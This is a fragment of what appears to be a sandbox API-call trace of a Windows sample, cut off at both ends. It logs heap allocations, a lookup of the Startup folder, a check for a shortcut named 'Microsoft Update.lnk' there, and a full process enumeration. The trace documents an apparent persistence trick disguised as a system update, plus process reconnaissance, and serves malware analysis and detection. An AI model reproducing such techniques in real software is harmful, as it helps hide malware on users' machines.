(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0291.282] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0291.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0291.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.285] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0291.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0291.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0291.285] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0291.286] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0291.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0291.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0291.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0291.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0291.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0291.287] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0291.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0291.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0291.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0291.288] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0291.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0291.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0291.288] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0291.290] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0291.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0291.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0291.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0291.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0291.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0291.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0291.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0291.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0291.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0291.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0291.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0291.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0291.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0291.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0291.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0291.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0291.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0291.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0291.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0291.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0291.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.322] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, 